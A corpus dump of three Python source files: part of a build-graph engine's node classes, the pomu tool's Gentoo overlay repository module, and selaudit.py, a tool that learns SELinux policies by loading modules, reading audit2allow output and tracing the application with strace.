return Throw(ValueError('No source of explicit dependency {}'.format(dependency)))
elif type(dep_state) != Return:
raise State.raise_unrecognized(dep_state)
# All dependencies are present! Set our value to a list of the resulting values.
return Return([dependency_states[d].value for d in dependencies])
class ProjectionNode(datatype('ProjectionNode', ['subject', 'product', 'variants', 'projected_subject', 'fields', 'input_product']), Node):
"""A Node that selects the given input Product for the Subject, and then selects for a new subject.
TODO: This is semantically very similar to DependenciesNode (which might be considered to be a
multi-field projection for the contents of a list). Should be looking for ways to merge them.
"""
@property
def is_cacheable(self):
return False
def _input_node(self):
return SelectNode(self.subject, self.input_product, self.variants, None)
def _output_node(self, step_context, projected_subject):
return SelectNode(projected_subject, self.product, self.variants, None)
def step(self, dependency_states, step_context):
# Request the product we need to compute the subject.
input_node = self._input_node()
input_state = dependency_states.get(input_node, None)
if input_state is None or type(input_state) == Waiting:
return Waiting([input_node])
elif type(input_state) == Throw:
return input_state
elif type(input_state) == Noop:
return Noop('Could not compute {} in order to project its fields.'.format(input_node))
elif type(input_state) != Return:
State.raise_unrecognized(input_state)
# The input product is available: use it to construct the new Subject.
input_product = input_state.value
values = []
for field in self.fields:
values.append(getattr(input_product, field))
# If there was only one projected field and it is already of the correct type, project it.
if len(values) == 1 and type(values[0]) is self.projected_subject:
projected_subject = values[0]
else:
projected_subject = self.projected_subject(*values)
output_node = self._output_node(step_context, projected_subject)
# When the output node is available, return its result.
output_state = dependency_states.get(output_node, None)
if output_state is None or type(output_state) == Waiting:
return Waiting([input_node, output_node])
elif type(output_state) == Noop:
return Noop('Successfully projected, but no source of output product for {}.'.format(output_node))
elif type(output_state) in [Throw, Return]:
return output_state
else:
raise State.raise_unrecognized(output_state)
class TaskNode(datatype('TaskNode', ['subject', 'product', 'variants', 'func', 'clause']), Node):
@property
def is_cacheable(self):
return True
def step(self, dependency_states, step_context):
# Compute dependencies.
dep_values = []
dependencies = [step_context.select_node(selector, self.subject, self.variants)
for selector in self.clause]
# If all dependency Nodes are Return, execute the Node.
for dep_select, dep_key in zip(self.clause, dependencies):
dep_state = dependency_states.get(dep_key, None)
if dep_state is None or type(dep_state) == Waiting:
return Waiting(dependencies)
elif type(dep_state) == Return:
dep_values.append(dep_state.value)
elif type(dep_state) == Noop:
if dep_select.optional:
dep_values.append(None)
else:
return Noop('Was missing (at least) input {}.'.format(dep_key))
elif type(dep_state) == Throw:
return dep_state
else:
State.raise_unrecognized(dep_state)
try:
return Return(self.func(*dep_values))
except Exception as e:
return Throw(e)
def __repr__(self):
return 'TaskNode(subject={}, product={}, variants={}, func={}, clause={}'\
.format(self.subject, self.product, self.variants, self.func.__name__, self.clause)
def __str__(self):
return repr(self)
class FilesystemNode(datatype('FilesystemNode', ['subject', 'product', 'variants']), Node):
"""A native node type for filesystem operations."""
_FS_PAIRS = {
(DirectoryListing, Dir),
(FileContent, File),
(Stats, Path),
(ReadLink, Link),
}
_FS_PRODUCT_TYPES = {product for product, subject in _FS_PAIRS}
@classmethod
def is_filesystem_pair(cls, subject_type, product):
"""True if the given subject type and product type should be computed using a FileystemNode."""
return (product, subject_type) in cls._FS_PAIRS
@classmethod
def generate_subjects(self, filenames):
"""Given filenames, generate a set of subjects for invalidation predicate matching."""
for f in filenames:
# Stats, ReadLink, or FileContent for the literal path.
yield Path(f)
yield File(f)
yield Link(f)
# DirectoryListings for parent dirs.
yield Dir(dirname(f))
@property
def is_cacheable(self):
"""Native node should not be cached."""
return False
def step(self, dependency_states, step_context):
try:
if self.product is Stats:
return Return(path_stat(step_context.project_tree, self.subject))
elif self.product is FileContent:
return Return(file_content(step_context.project_tree, self.subject))
elif self.product is DirectoryListing:
return Return(list_directory(step_context.project_tree, self.subject))
elif self.product is ReadLink:
return Return(read_link(step_context.project_tree, self.subject))
else:
# This would be caused by a mismatch between _FS_PRODUCT_TYPES and the above switch.
raise ValueError('Mismatched input value {} for {}'.format(self.subject, self))
except Exception as e:
return Throw(e)
class StepContext(object):
"""Encapsulates external state and the details of creating Nodes.
This avoids giving Nodes direct access to the task list or subject set.
"""
def __init__(self, node_builder, project_tree):
self._node_builder = node_builder
self.project_tree = project_tree
def gen_nodes(self, subject, product, variants):
"""Yields Node instances which might be able to provide a value for the given inputs."""
return self._node_builder.gen_nodes(subject, product, variants)
def select_node(self, selector, subject, variants):
"""Constructs a Node for the given Selector and the given Subject/Variants."""
return self._node_builder.select_node(selector, subject, variants)
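def run_node_example(node, step_context, compute_dependency_state):
  """An illustrative sketch, not part of the engine: drive a single Node to completion by
  re-running step() as dependency States become available, mirroring the contract that
  Node.step documents above. The `compute_dependency_state` callable is an assumption that
  stands in for whatever evaluates a dependency Node to a State.
  """
  dependency_states = {}
  while True:
    state = node.step(dependency_states, step_context)
    if type(state) is not Waiting:
      return state
    for dep in state.dependencies:
      if dep not in dependency_states:
        dependency_states[dep] = compute_dependency_state(dep)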
| apache-2.0 | 3,330,527,426,951,108,000 | 38.904429 | 139 | 0.691629 | false |
Hummer12007/pomu | pomu/repo/repo.py | 1 | 9456 | """Subroutines with repositories"""
from os import path, rmdir, makedirs
from shutil import copy2
from git import Repo
from patch import PatchSet
import portage
from pomu.package import Package, PatchList
from pomu.util.cache import cached
from pomu.util.fs import remove_file, strip_prefix
from pomu.util.result import Result
class Repository():
def __init__(self, root, name=None):
"""
Parameters:
root - root of the repository
name - name of the repository
"""
if not pomu_status(root):
raise ValueError('This path is not a valid pomu repository')
self.root = root
self.name = name
@property
def repo(self):
return Repo(self.root)
@property
def pomu_dir(self):
return path.join(self.root, 'metadata/pomu')
def merge(self, mergeable):
"""Merges a package or a patchset into the repository"""
if isinstance(mergeable, Package):
return self.merge_pkg(mergeable)
elif isinstance(mergeable, PatchList):
pkg = self.get_package(mergeable.name, mergeable.category,
mergeable.slot).unwrap()
return pkg.patch(mergeable.patches)
return Result.Err() #unreachable yet
def merge_pkg(self, package):
"""Merge a package (a pomu.package.Package package) into the repository"""
r = self.repo
pkgdir = path.join(self.pomu_dir, package.category, package.name)
if package.slot != '0':
pkgdir = path.join(pkgdir, package.slot)
package.merge_into(self.root).expect('Failed to merge package')
for wd, f in package.files:
r.index.add([path.join(wd, f)])
manifests = package.gen_manifests(self.root).expect()
for m in manifests:
r.index.add([m])
self.write_meta(pkgdir, package, manifests)
with open(path.join(self.pomu_dir, 'world'), 'a+') as f:
f.write('{}/{}'.format(package.category, package.name))
f.write('\n' if package.slot == '0' else ':{}\n'.format(package.slot))
r.index.add([path.join(self.pomu_dir, package.category, package.name)])
r.index.add([path.join(self.pomu_dir, 'world')])
r.index.commit('Merged package ' + package.name)
return Result.Ok('Merged package ' + package.name + ' successfully')
def write_meta(self, pkgdir, package, manifests):
"""
Write metadata for a Package object
Parameters:
pkgdir - destination directory
package - the package object
manifests - list of generated manifest files
"""
makedirs(pkgdir, exist_ok=True)
with open(path.join(pkgdir, 'FILES'), 'w+') as f:
for wd, fil in package.files:
f.write('{}/{}\n'.format(wd, fil))
for m in manifests:
f.write('{}\n'.format(strip_prefix(m, self.root)))
if package.patches:
patch_dir = path.join(pkgdir, 'patches')
makedirs(patch_dir, exist_ok=True)
with open(path.join(pkgdir, 'PATCH_ORDER'), 'w') as f:
for patch in package.patches:
copy2(patch, patch_dir)
f.write(path.basename(patch) + '\n')
if package.backend:
with open(path.join(pkgdir, 'BACKEND'), 'w+') as f:
f.write('{}\n'.format(package.backend.__cname__))
package.backend.write_meta(pkgdir)
with open(path.join(pkgdir, 'VERSION'), 'w+') as f:
f.write(package.version)
def unmerge(self, package):
"""Remove a package (by contents) from the repository"""
r = self.repo
for wd, f in package.files:
dst = path.join(self.root, wd)
remove_file(r, path.join(dst, f))
try:
rmdir(dst)
except OSError: pass
pf = path.join(self.pomu_dir, package.name)
if path.isfile(pf):
remove_file(r, pf)
        r.index.commit('Removed package ' + package.name + ' successfully')
return Result.Ok('Removed package ' + package.name + ' successfully')
def remove_package(self, name):
"""Remove a package (by name) from the repository"""
pkg = self.get_package(name).expect()
return self.unmerge(pkg)
def update_package(self, category, name, new):
"""Updates a package, replacing it by a newer version"""
        pkg = self.get_package(name, category).expect()
self.unmerge(pkg).expect()
self.merge(new)
def _get_package(self, category, name, slot='0'):
"""Get an existing package (by category, name and slot), reading the manifest"""
from pomu.source import dispatcher
if slot == '0':
pkgdir = path.join(self.pomu_dir, category, name)
else:
pkgdir = path.join(self.pomu_dir, category, name, slot)
backend = None
if path.exists(path.join(pkgdir, 'BACKEND')):
with open(path.join(pkgdir, 'BACKEND'), 'r') as f:
bname = f.readline().strip()
backend = dispatcher.backends[bname].from_meta_dir(pkgdir)
if backend.is_err():
return backend
backend = backend.ok()
with open(path.join(pkgdir, 'VERSION'), 'r') as f:
version = f.readline().strip()
with open(path.join(pkgdir, 'FILES'), 'r') as f:
files = [x.strip() for x in f]
patches=[]
if path.isfile(path.join(pkgdir, 'PATCH_ORDER')):
with open(path.join(pkgdir, 'PATCH_ORDER'), 'r') as f:
patches = [x.strip() for x in f]
pkg = Package(name, self.root, backend, category=category, version=version, slot=slot, files=files, patches=[path.join(pkgdir, 'patches', x) for x in patches])
pkg.__class__ = MergedPackage
return Result.Ok(pkg)
def get_package(self, name, category=None, slot=None):
"""Get a package by name, category and slot"""
with open(path.join(self.pomu_dir, 'world'), 'r') as f:
for spec in f:
spec = spec.strip()
cat, _, nam = spec.partition('/')
nam, _, slo = nam.partition(':')
if (not category or category == cat) and nam == name:
if not slot or (slot == '0' and not slo) or slot == slo:
                        return self._get_package(cat, name, slo or '0')
return Result.Err('Package not found')
def get_packages(self):
with open(path.join(self.pomu_dir, 'world'), 'r') as f:
lines = [x.strip() for x in f.readlines() if x.strip() != '']
return lines
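# Illustrative sketch of how the Repository methods above are typically
# combined. The repository root below is an assumption; Repository() raises
# ValueError unless <root>/metadata/pomu exists, and `package` must be a
# pomu.package.Package object.
def _example_repository_roundtrip(package, root='/var/db/repos/local'):
    """Merge a package object, look it up again, then remove it."""
    repo = Repository(root, name='local')
    repo.merge(package).expect('merge failed')
    found = repo.get_package(package.name, package.category).expect()
    return repo.unmerge(found)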
def portage_repos():
"""Yield the repositories configured for portage"""
rsets = portage.db[portage.root]['vartree'].settings.repositories
for repo in rsets.prepos_order:
yield repo
def portage_repo_path(repo):
"""Get the path of a given portage repository (repo)"""
rsets = portage.db[portage.root]['vartree'].settings.repositories
if repo in rsets.prepos:
return rsets.prepos[repo].location
return None
def pomu_status(repo_path):
"""Check if pomu is enabled for a repository at a given path (repo_path)"""
return path.isdir(path.join(repo_path, 'metadata', 'pomu'))
def pomu_active_portage_repo():
"""Returns a portage repo, for which pomu is enabled"""
for repo in portage_repos():
if pomu_status(portage_repo_path(repo)):
return repo
return None
@cached
def pomu_active_repo(no_portage=None, repo_path=None):
"""Returns a repo for which pomu is enabled"""
if no_portage:
if not repo_path:
return Result.Err('repo-path required')
if pomu_status(repo_path):
return Result.Ok(Repository(repo_path))
return Result.Err('pomu is not initialized')
else:
repo = pomu_active_portage_repo()
if repo:
return Result.Ok(Repository(portage_repo_path(repo), repo))
return Result.Err('pomu is not initialized')
class MergedPackage(Package):
@property
def pkgdir(self):
ret = path.join(self.root, 'metadata', 'pomu', self.category, self.name)
if self.slot != '0':
ret = path.join(ret, self.slot)
return ret
def patch(self, patch):
if isinstance(patch, list):
for x in patch:
self.patch(x)
return Result.Ok()
ps = PatchSet()
ps.parse(open(patch, 'r'))
ps.apply(root=self.root)
self.add_patch(patch)
return Result.Ok()
@property
def patch_list(self):
with open(path.join(self.pkgdir, 'PATCH_ORDER'), 'r') as f:
lines = [x.strip() for x in f.readlines() if x.strip() != '']
return lines
def add_patch(self, patch, name=None): # patch is a path, unless name is passed
patch_dir = path.join(self.pkgdir, 'patches')
makedirs(patch_dir, exist_ok=True)
if name is None:
copy2(patch, patch_dir)
with open(path.join(self.pkgdir, 'PATCH_ORDER'), 'w+') as f:
f.write(path.basename(patch) + '\n')
else:
with open(path.join(patch_dir, name), 'w') as f:
f.write(patch)
with open(path.join(self.pkgdir, 'PATCH_ORDER'), 'w+') as f:
f.write(name + '\n')
| gpl-2.0 | 5,766,960,781,250,393,000 | 38.07438 | 167 | 0.579315 | false |
Siosm/contextd-capture | piga-systrans/selaudit/selaudit.py | 2 | 25513 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# Configuration
# Templates
basepolname = 'template/module'
base_transpol_name = 'template/temp_transition'
makefile_path = 'template/Makefile'
# Default value for the template variables
user_u_default = 'user_u'
user_r_default = 'user_r'
user_t_default = 'user_t'
module_domain_t_default_pattern = 'user_%modulename%_t'
module_exec_t_default_pattern = '%modulename%_exec_t'
module_tmp_domain_t_default_pattern = '%modulename%_tmp_t'
module_log_domain_t_default_pattern = '%modulename%_log_t'
# Selpolgen user
selpolgen_u_default = 'root'
selpolgen_r_default = 'sysadm_r'
selpolgen_t_default = 'sysadm_t'
# Programs fullpath
semodule_path = '/usr/sbin/semodule'
make_path = '/usr/bin/make'
setfilecon_path = '/usr/sbin/setfilecon'
runcon_path = '/usr/bin/runcon'
audit2allow_path = '/usr/bin/audit2allow'
dmesg_path = '/bin/dmesg'
strace_path = '/usr/bin/strace'
ls_path = '/bin/ls'
setfiles_path = '/sbin/setfiles'
# /Configuration
# Import
import getopt
import re, string, sys
import os, signal
import glob
import subprocess
import shutil
import time
from pigi import *
# Global variables
verbosity = 0
wantToAbort = False
# functions
def log(priority, msg):
if priority <= verbosity:
print(msg)
def handler(signum, frame):
global wantToAbort
wantToAbort = True
def mkdir_p(path):
if not os.path.exists (path):
os.makedirs (path)
def getPolicyPath(module_name, extension=''):
if len(extension) > 0:
return "policies/%s/%s.%s" % (module_name, module_name, extension)
else:
return "policies/%s/" % module_name
def getTempModuleTransitionPath(module_name, extension=''):
if len(extension) > 0:
return "temp/%s/%s.%s" % (module_name, module_name, extension)
else:
return "temp/%s/" % module_name
def loadSELinuxModule(module_path_pp):
proc = subprocess.Popen([semodule_path, '-i', module_path_pp], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout,stderr = proc.communicate()
if proc.returncode != 0:
print("----\nError while loading the SELinux module '%s':\n<stdout>%s</stdout>\n<stderr>%s</stderr>\n----" % (module_path_pp, stdout, stderr), file=sys.stderr)
return False
else:
return True
def unloadSELinuxModule(module_name):
proc = subprocess.Popen([semodule_path, '-r', module_name], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout,stderr = proc.communicate()
if proc.returncode != 0:
print("----\nError while unloading the SELinux module '%s':\n<stdout>%s</stdout>\n<stderr>%s</stderr>\n----" % (module_name, stdout, stderr), file=sys.stderr)
return False
else:
return True
def reloadSELinuxModule(module_name):
if unloadSELinuxModule(module_name):
if loadSELinuxModule(getPolicyPath(module_name, "pp")):
return True
else:
return False
else:
return False
def compileAndLoadSELinuxModule(module_dir):
proc = subprocess.Popen([make_path, 'load'], cwd=module_dir, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout,stderr = proc.communicate()
if proc.returncode != 0:
print("----\nError while compiling and loading the module at '%s':\n<stdout>%s</stdout>\n<stderr>%s</stderr>\n----" % (module_dir, stdout, stderr), file=sys.stderr)
return False
else:
return True
def generateBasePolicy(module_name, app_path, module_domain_t, module_tmp_domain_t, module_log_domain_t, module_exec_t, user_u, user_r, user_t, permissive_mode=False):
#TODO add exceptions handling. It's fine for the moment as these exceptions are fatal for the program
# Get the template
template_te = open("%s.te" % basepolname, "r").read()
template_if = open("%s.if" % basepolname, "r").read()
template_fc = open("%s.fc" % basepolname, "r").read()
if len(template_te) == 0:
return ''
if permissive_mode:
template_te += "permissive ${module_domain_t};"
# Replace the template variables by our values
dico=dict({"module": module_name, "app_path": app_path, "module_domain_t": module_domain_t, "module_tmp_domain_t": module_tmp_domain_t, "module_log_domain_t": module_log_domain_t, "module_exec_t": module_exec_t, "user_u": user_u, "user_r": user_r, "user_t": user_t})
for key in dico.keys():
template_te=template_te.replace("${%s}" % key, dico[key])
template_if=template_if.replace("${%s}" % key, dico[key])
template_fc=template_fc.replace("${%s}" % key, dico[key])
# Create a directory for the output module
mkdir_p(getPolicyPath(module_name, ""))
# write the output module there
file_te = open(getPolicyPath(module_name, "te"), "w").write(template_te)
file_if = open(getPolicyPath(module_name, "if"), "w").write(template_if)
file_fc = open(getPolicyPath(module_name, "fc"), "w").write(template_fc)
# Copy the Makefile
shutil.copyfile(makefile_path, "%sMakefile" % getPolicyPath(module_name, ""))
return getPolicyPath(module_name)
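# Illustrative note (the template line is invented): the substitution loop
# above rewrites ${...} placeholders using the dico mapping, so a line such as
#     type ${module_domain_t};
# becomes, for a module named "foo" with the default patterns,
#     type user_foo_t;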
def generateAuditPolicy(module_name, app_path, module_domain_t, module_exec_t, user_u, user_r, user_t):
#TODO add exceptions handling. It's fine for the moment as these exceptions are fatal for the program
module_name = "selpolgen-%s" % module_name
# Get the template
template_te = open("%s.te" % base_transpol_name, "r").read()
template_if = open("%s.if" % base_transpol_name, "r").read()
template_fc = open("%s.fc" % base_transpol_name, "r").read()
if len(template_te) == 0:
return ''
# Replace the template variables by our values
dico=dict({"module": module_name, "app_path": app_path, "module_domain_t": module_domain_t, "module_exec_t": module_exec_t, "user_u": user_u, "user_r": user_r, "user_t": user_t})
for key in dico.keys():
template_te=template_te.replace("${%s}" % key, dico[key])
template_if=template_if.replace("${%s}" % key, dico[key])
template_fc=template_fc.replace("${%s}" % key, dico[key])
# Remove the directory for the output module
try:
shutil.rmtree(getTempModuleTransitionPath(module_name, ""))
except:
pass
# Create a directory for the output module
mkdir_p(getTempModuleTransitionPath(module_name, ""))
# write the output module there
file_te = open(getTempModuleTransitionPath(module_name, "te"), "w").write(template_te)
file_if = open(getTempModuleTransitionPath(module_name, "if"), "w").write(template_if)
file_fc = open(getTempModuleTransitionPath(module_name, "fc"), "w").write(template_fc)
# Copy the Makefile
shutil.copyfile(makefile_path, "%sMakefile" % getTempModuleTransitionPath(module_name, ""))
return getTempModuleTransitionPath(module_name)
def setFileSELinuxContext(user_u, role_r, type_t, filepath):
context = '%s:%s:%s' % (user_u, role_r, type_t)
proc = subprocess.Popen([setfilecon_path, context, filepath], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout,stderr = proc.communicate()
if proc.returncode != 0:
print("Error while setting the context %s to the file '%s':\n<stdout>%s</stdout>\n<stderr>%s</stderr>" % (context, filepath, stdout, stderr), file=sys.stderr)
return False
else:
return True
def getAudit2AllowRules(domain_t):
rules = []
proc = subprocess.Popen([audit2allow_path, "-d"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout,stderr = proc.communicate()
if proc.returncode != 0:
print("Error while auditing:\n<stdout>%s</stdout>\n<stderr>%s</stderr>" % (stdout, stderr), file=sys.stderr)
return rules
lines=stdout.splitlines()
log(2, "audit2allow output (%i lines) is: '%s'" % (len(lines), stdout))
store=False
for line in lines:
line = line.decode()
log(2, "line[:10] = '%s'" % (line[:10]))
if line[:10] == "#=========":
fields=line.split(" ")
if fields[1] == domain_t:
store = True
else:
store = False
else:
if store and len(line)>0:
rules.append(line);
return rules
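# For reference, a hedged sketch of the `audit2allow -d` output layout the
# parser above assumes (the domain and rules below are invented):
#
#   #============= user_foo_t ==============
#   allow user_foo_t user_home_t:file { read open getattr };
#   allow user_foo_t tmp_t:dir { write add_name };
#
# Only the rules appearing under the header whose second field equals
# domain_t are collected into the returned list.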
def regeneratePolicy(policy_path, rules, permissive_domains = list()):
# Add the lines to the policy
template_te = open(policy_path, "a");
#template_te.writelines(rules)
for line in rules:
template_te.write(line+"\n")
template_te.close()
# Parse it
scanner = SELinuxScanner()
parser = SELinuxParser(scanner)
te_file = open(policy_path, "r")
tokens = parser.parse(te_file.read())
te_file.close()
# Store it optimized
optimizer = SELinuxOptimizer(tokens)
optimizer.selfize_rules()
optimizer.factorize_rules()
optimizer.factorize_rule_attributes()
optimizer.sort_rules()
optimizer.to_file(policy_path, permissive_domains)
def updateAndReloadRules(module_name, module_domain_t, enforcingMode = True, forceReload=False):
log(1, "Read the audit2allow output")
rules = getAudit2AllowRules(module_domain_t)
if forceReload or len(rules) > 0:
log(0, "Add %i rules to %s and reload the policy" % (len(rules), getPolicyPath(module_name, "te")))
if not enforcingMode:
permissive_domains = [module_domain_t]
else:
permissive_domains = list()
regeneratePolicy(getPolicyPath(module_name, "te"), rules, permissive_domains)
# empty the logs
dmesg = subprocess.Popen([dmesg_path, '-c'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
dmesg.communicate()
# Load the new policy
compileAndLoadSELinuxModule(getPolicyPath(module_name, ""))
return len(rules)
def runApp(module_name, app_path, useStrace=False):
if useStrace and os.path.exists(strace_path):
print("Launch the application and trace it with strace")
proc = subprocess.Popen([strace_path, '-e' 'trace=open,execve,mkdir', '-o', "%sstrace" % getTempModuleTransitionPath("selpolgen-%s" % module_name, ""), '-ff', '-F', app_path])
else:
print("Launch the application")
proc = subprocess.Popen([app_path])
# get the pid
curPID = proc.pid
return proc
def askToRunApp(app_path, domain_t, audit_fc=False):
deleteFileList(["/tmp/selinux-audit"])
print("\n****** Entering the auditing loop ******")
if audit_fc:
        print("The application you are auditing will first be launched in a permissive mode; be sure to use all the functionalities before quitting it.\n")
print("Please launch this command in the domain %s: %s" % (domain_t, "selaudit_user.sh %s" % app_path))
def getFileCon(filepath):
proc = subprocess.Popen([ls_path, '-Z', filepath], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout,stderr = proc.communicate()
if proc.returncode != 0:
# print("Error while getting the context of the file '%s':\n<stdout>%s</stdout>\n<stderr>%s</stderr>" % (filepath, stdout, stderr), file=sys.stderr)
return "<Context not found>"
fields = str(stdout, "utf-8").split(' ')
log(2, "getFileCon('%s') = '%s'" % (filepath, fields[0]))
return fields[0]
def deleteFileList(to_be_deleted):
for f in to_be_deleted:
try:
if os.path.isfile(f) or os.path.islink(f):
os.remove(f)
elif os.path.isdir(f):
shutil.rmtree(f)
except Exception as inst:
print("deleteFileList: Caught exception %s: %s" % (type(inst), inst))
pass
def escape_re(re):
re = re.replace(".", "\\.");
    re = re.replace("(", "\\(");
re = re.replace(")", "\\)");
re = re.replace("|", "\\|");
re = re.replace("^", "\\^");
re = re.replace("*", "\\*");
re = re.replace("+", "\\+");
re = re.replace("?", "\\?");
return re
def auditStraceLogs(module_name, dir_path="/tmp/selinux-audit/", saveResults=True):
# dir_path = getTempModuleTransitionPath("selpolgen-%s" % module_name, "")
execves = dict()
mkdirs = dict()
opens = dict()
libs = dict()
shms = dict()
failed = list()
to_be_deleted = list()
# Read all the logs
log_files = glob.glob("%s/strace*" % dir_path)
for log in log_files:
f = open(log, "r")
for line in f:
m = re.match(r"(?P<function>\w+) *\((?P<params>.*)\) *= *(?P<result>.*)", line)
if m:
args = m.group('params').split(', ')
if not m.group('result').startswith("-1"):
line = "%s(%s)" % (m.group('function'), ','.join(args))
m2 = re.match(r"\"(.*)\"", args[0])
if m2:
filepath = m2.group(1)
if m.group('function') == "open":
if args[1].find('O_CREAT') != -1 or args[1].find('O_WRONLY') != -1:
to_be_deleted.append(filepath)
# Is the file a standard library ?
stdlib = re.match(r"/(usr/)?lib/[^/]+", filepath)
if filepath.startswith('/dev/shm'):
if filepath not in shms:
shms[filepath] = list()
if line not in shms[filepath]:
shms[filepath].append(line)
elif stdlib:
if filepath not in opens:
libs[filepath] = list()
if line not in libs[filepath]:
libs[filepath].append(line)
else:
if filepath not in opens:
opens[filepath] = list()
if line not in opens[filepath]:
opens[filepath].append(line)
elif m.group('function') == "mkdir":
if filepath not in mkdirs:
mkdirs[filepath] = list()
if line not in mkdirs[filepath]:
mkdirs[filepath].append(line)
to_be_deleted.append(filepath)
elif m.group('function') == "execve":
if filepath not in execves:
execves[filepath] = list()
if line not in execves[filepath]:
execves[filepath].append(line)
else:
line = "%s(%s)" % (m.group('function'), ','.join(args))
f.close()
# Delete all the strace files
deleteFileList(log_files);
if saveResults:
# We have the logs, sorted by type and by path, generate the output file
fc_file = open(getPolicyPath(module_name, "fc"), "a")
fc_file.write("\n\n\n# **** Mkdir ****\n")
mkdir_keys = mkdirs.keys()
for dir_path in sorted(mkdir_keys):
# Write all the interactions with this file
for call in mkdirs[dir_path]:
fc_file.write("# %s\n" % call)
# Propose a rule
fc_file.write("#%s/(.*/)? %s\n\n" % (escape_re(dir_path), getFileCon(dir_path)))
fc_file.write("\n\n\n# **** Execve ****\n")
execve_keys = execves.keys()
for exe_path in sorted(execve_keys):
# Write all the interactions with this file
for call in execves[exe_path]:
fc_file.write("# %s\n" % call)
# Propose a rule
fc_file.write("#%s -- %s\n\n" % (escape_re(exe_path), getFileCon(exe_path)))
fc_file.write("\n\n\n# **** Open ****\n")
open_keys = opens.keys()
for open_path in sorted(open_keys):
# Write all the interactions with this file
for call in opens[open_path]:
fc_file.write("# %s\n" % call)
# Propose a rule
fc_file.write("#%s -- %s\n\n" % (escape_re(open_path), getFileCon(open_path)))
fc_file.write("\n\n\n# **** Standard libraries ****\n")
libs_keys = libs.keys()
for lib_path in sorted(libs_keys):
# Write all the interactions with this file
for call in libs[lib_path]:
fc_file.write("# %s\n" % call)
# Propose a rule
fc_file.write("#%s -- %s\n\n" % (escape_re(lib_path), getFileCon(lib_path)))
fc_file.write("\n\n\n# **** SHM ****\n")
shms_keys = shms.keys()
for shm_path in sorted(shms_keys):
# Write all the interactions with this file
for call in shms[shm_path]:
fc_file.write("# %s\n" % call)
# Propose a rule
fc_file.write("#%s -- %s\n\n" % (escape_re(shm_path), getFileCon(shm_path)))
# Delete all the created files
deleteFileList(to_be_deleted);
def parseFCFile(policy_fc):
# Read the fc policy
if not os.path.exists(policy_fc):
return set(), "The fc policy file %s doesn't exist\n" % policy_fc
fc_policy_file = open("%s" % policy_fc, "r")
# split the fc policy file
fc_policies = []
for line in fc_policy_file:
m = re.match(r"\s*(?P<comment>#)?(?P<path>\\?/\S+)\s+(?P<type>\S+)?\s+(?P<context>\S+)", line)
if m:
pol = dict()
pol['path'] = m.groupdict()['path']
pol['type'] = m.groupdict()['type']
pol['context'] = m.groupdict()['context']
pol['commented'] = m.groupdict()['comment']=="#"
if (pol['type'] == None):
pol['type'] = ''
#print("Found rule: comment = '%s' path='%s', type='%s', context='%s'" % (pol['commented'], pol['path'], pol['type'], pol['context']))
fc_policies.append(pol)
return fc_policies
def addFCContextsToTE(policy_fc, policy_te):
# Read the te policy
if not os.path.exists(policy_te):
return set(), "The te policy file %s doesn't exist\n" % policy_fc
te_policy_file = open("%s" % policy_te, "a")
fc_policies = parseFCFile(policy_fc)
for policy in fc_policies:
if not policy['commented']:
print("got context %s\n" % policy['context'])
te_policy_file.write("type %s;\nfiles_type(%s);\n" % (policy['context'], policy['context']))
te_policy_file.close()
def editFiles(filepathes):
editor_path = os.getenv('EDITOR')
    if not editor_path:
        print('The $EDITOR environment variable is not set.\nWhich editor would you like to use?')
        editor_path = input('')
        os.environ['EDITOR'] = editor_path
    params = [editor_path]
params.extend(filepathes)
proc = subprocess.Popen(params)
proc.communicate()
return proc.returncode == 0
def willingToQuit():
print("\nThe system is currently learning a SELinux security policy.")
    print("Deciding to stop it now means you have successfully tested all the functionalities of the software you are auditing.")
print("\nAre you sure you want to stop it ? (y/N)")
answer=input('')
if answer in ('y', 'Y', 'Yes', 'yes'):
return True
else:
return False
def startAuditing(module_name, app_path, module_domain_t, module_tmp_domain_t, module_log_domain_t, module_exec_t, user_u, user_r, user_t, audit_fc, reuse):
# Re-route signals to the launched process
signal.signal(signal.SIGINT, handler)
signal.signal(signal.SIGTERM, handler)
signal.signal(signal.SIGHUP, handler)
global wantToAbort
wantToAbort = False
if not reuse:
# Get a base policy and load it
print("Generate the base policy and load it")
base_policy=generateBasePolicy(module_name, app_path, module_domain_t, module_tmp_domain_t, module_log_domain_t, module_exec_t, user_u, user_r, user_t, audit_fc)
if not compileAndLoadSELinuxModule(base_policy):
return False
else:
if not os.path.exists(getPolicyPath(module_name, "te")):
print("The module %s doesn't exist." % module_name)
return
# Create a policy for selpolgen.py so as when it launches the audited program, the audited program will transit to the right domain
print("Generate the sysadm policy to launch the application in the right context")
temp_policy=generateAuditPolicy(module_name, app_path, module_domain_t, module_exec_t, user_u, user_r, user_t)
if not compileAndLoadSELinuxModule(temp_policy):
return False
# Set the app context on the disc
print("Set the application file's new context")
setFileSELinuxContext("system_u", "object_r", module_exec_t, app_path)
# run the application
askToRunApp(app_path, user_t, audit_fc);
if audit_fc:
isRunning = True
while isRunning :
if wantToAbort:
if willingToQuit():
sys.exit(0)
else:
wantToAbort = False
time.sleep(0.1)
# remove the lock if the file exists
if os.path.exists("/tmp/selinux-audit/lock"):
isRunning = False
# Propose some file constraints
print("Update the fc file, this may take a while");
auditStraceLogs(module_name)
# Regenerate the policy
updateAndReloadRules(module_name, module_domain_t, enforcingMode = True, forceReload=True)
# let the application start again
os.remove("/tmp/selinux-audit/lock")
print("FC Labelling done\n")
print("Start the TE learning loop")
# learning loop
nbRulesAddedSinceLastExecution = 0
execStart = time.time()
zeroRuleLoopCount = 0
while True:
if wantToAbort:
if willingToQuit():
break
else:
wantToAbort = False
time.sleep(0.1)
nbRulesAddedSinceLastExecution += updateAndReloadRules(module_name, module_domain_t)
# remove the lock if the file exists
if os.path.exists("/tmp/selinux-audit/lock"):
if nbRulesAddedSinceLastExecution > 0:
auditStraceLogs(module_name, dir_path="/tmp/selinux-audit/", saveResults=False)
zeroRuleLoopCount = 0
elif time.time()-execStart > 2.0 or zeroRuleLoopCount > 5:
print("\n**********\nNo rules have been added during the execution of this audit instance.")
print("Have you tested every use case allowed for the application ? (y/N)")
answer=input('')
print("**********")
if answer in ('y', 'Y', 'Yes', 'yes'):
break
zeroRuleLoopCount = 0
else:
zeroRuleLoopCount = zeroRuleLoopCount + 1
